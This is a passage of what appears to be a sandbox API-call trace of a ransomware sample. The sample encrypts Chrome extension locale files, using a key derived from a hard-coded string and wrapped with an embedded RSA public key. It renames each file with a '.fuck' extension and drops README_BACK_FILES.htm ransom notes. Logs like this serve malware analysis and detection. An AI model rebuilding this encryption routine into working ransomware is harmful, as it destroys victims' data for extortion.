Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0259.646] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0259.647] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0259.648] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0259.649] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.649] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.649] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.649] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.649] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.650] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0259.650] AreFileApisANSI () returned 1 [0259.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0259.650] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.650] GetFileType (hFile=0x5d64) returned 0x1 [0259.650] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.655] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.655] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.656] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.656] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.656] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.656] GetLastError () returned 0x0 [0259.656] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json")) returned 0x20 [0259.656] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0259.656] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.657] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.658] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.658] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.660] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.660] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.660] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.660] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.660] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.660] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.660] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6e070) returned 1 [0259.661] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e070, dwCertEncodingType=0x1, pInfo=0x2e28020*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28050*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28058*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d000) returned 1 [0259.661] CryptEncrypt (in: hKey=0x2e7d000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.661] CryptEncrypt (in: hKey=0x2e7d000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6e0f8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6e0f8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.661] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6e0f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6e0f8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.662] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x29c, lpOverlapped=0x0) returned 1 [0259.675] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x29c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0259.675] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0259.685] CloseHandle (hObject=0x5d60) returned 1 [0259.685] CloseHandle (hObject=0x5d5c) returned 1 [0259.685] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0259.687] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0259.688] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0259.689] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0259.690] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.690] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.690] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.690] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.690] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.690] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0259.690] AreFileApisANSI () returned 1 [0259.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.690] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.691] GetFileType (hFile=0x5d64) returned 0x1 [0259.691] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.692] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.692] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.692] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.692] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.692] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.692] GetLastError () returned 0x0 [0259.692] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json")) returned 0x20 [0259.693] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0259.693] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.694] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.695] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.696] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.698] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.698] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.698] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.698] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.698] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.698] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.698] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6e180) returned 1 [0259.699] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e180, dwCertEncodingType=0x1, pInfo=0x2e28360*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28390*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28398*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ccc0) returned 1 [0259.699] CryptEncrypt (in: hKey=0x2e7ccc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.699] CryptEncrypt (in: hKey=0x2e7ccc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6e208*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6e208*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.699] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6e208*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6e208*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.700] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x30f, lpOverlapped=0x0) returned 1 [0259.702] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x30f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x310) returned 1 [0259.702] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x310, lpOverlapped=0x0) returned 1 [0259.704] CloseHandle (hObject=0x5d5c) returned 1 [0259.704] CloseHandle (hObject=0x5d60) returned 1 [0259.704] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0259.707] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0259.707] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0259.708] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0259.709] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.709] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.709] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.709] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.709] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.709] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0259.709] AreFileApisANSI () returned 1 [0259.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.709] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 